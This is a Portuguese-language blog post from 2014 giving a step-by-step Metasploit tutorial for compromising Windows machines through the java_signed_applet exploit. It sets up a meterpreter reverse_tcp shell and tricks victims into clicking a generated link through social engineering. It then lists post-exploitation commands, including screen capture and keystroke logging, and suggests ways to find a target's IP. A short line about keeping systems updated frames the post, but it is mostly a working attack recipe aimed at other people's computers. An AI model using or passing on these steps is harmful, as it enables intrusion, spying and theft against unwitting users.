sábado, 7 de junho de 2014

Invadindo Windows Com Java Signed Applet

Invadindo Windows Com Java Signed Applet



Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows , pois através de engenharia social como induzir os usuários a clicaram em links através de textos os imagens esta vulnerabilidade pode ser explorada.

Conscientize amigos e colegas de trabalho para se atentarem aos links que recebem via e-mail, facebook e ente outros para evitarem se serem vítimas desta vulnerabilidade.

Uma forma de evitar é manter sempre o Windows e o Antivirus devidamente atualizados.

Este mesmo método pode ser ultilizado por metasploit de qualquer linux,windows,backtrack ou kali linux nesse caso irei usar o Kali Linux que é o método mais atual:



Informações que o pentester deve saber:


Ip do Kali Linux: o ip de exemplo que irei usar é:10.10.10.130 no caso, se não souber o ip do seu Kali Linux,abra o terminal e digite Ifconfig, Verifique qual é seu adaptador de rede padrão e anote o ip como no exemplo a seguir:

 
se ultilizar o metasploit em um windows abra o cmd e digite "ipconfig" procure seu adaptador de rede padrão e anote onde estiver escrito "gathway padrão".
Ip do alvo: existem varias formas pra descobrir o ip de um determinado alvo, como iplogger e skyperesolver, ou simplesmente voce pode testar em uma máquina virtual ou em seu próprio pc.
Usarei Ip alvo:10.10.10.129

Vamos ao Ataque

Passo 1: Tendo essas informações abra o terminal do kali linux e digite msfconsole
2 passo:Vamos ultilizar o exploit Java Signed Applet
então msf  >  use exploit/multi/browser/java_signed_applet


3 passo: defina o servidor do kali linux como conexão principal, caso queria mandar a conexão para outra máquina basta digitar o ip dela.
msf exploit (java_signed_applet) > set SRVHOST 10.10.10.130

4 passo Defina a porta do servidor Kali Linux (8080) como conexão principal do exploit java_signed_applet
msf exploit (java_signed_applet) > set SRVPORT 8080
5 passo: Utilize o PAYLOAD reserve_tcp para estabelecer a conexão entre o host e o servidor
msf exploit (java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
passo 6: Defina o servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp
msf exploit (java_signed_applet) > set LHOST 10.10.10.130
Passo 7:Defina a porta do servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp
msf exploit (java_signed_applet) > set LPORT 4444
Passo 8: Execute o exploit para gerar a URL a ser acessada pelo Windows (http://10.10.10.130:8080/clR8lKjmGpiSXqQ)
msf exploit (java_signed_applet) > exploit
Passo 9: No Windows ao realizar o acesso ao link (http://10.10.10.130:8080/clR8lKjmGpiSXqQ) será exibida uma janela de Advertência de Segurança, aceite o Risco e clique em Executar
Passo 10: Observe que a conexão foi estabelecida com o servidor
Pronto a invasão foi feita com sucesso!
agora você pode usar os seguintes comandos pelo shell da vitima:
sessions: exibe sessões de conexão
ipconfig: visualizar conexões de rede
sysinfo: exibe informações do sistema
sell:para abrir o console
dir: navegar entre pastas
screenshot : prints da tela
keyscan_start:teclas digitadas
ls:lista de diretórios
ps: processos abertos no pc da vitima

Nenhum comentário:

Postar um comentário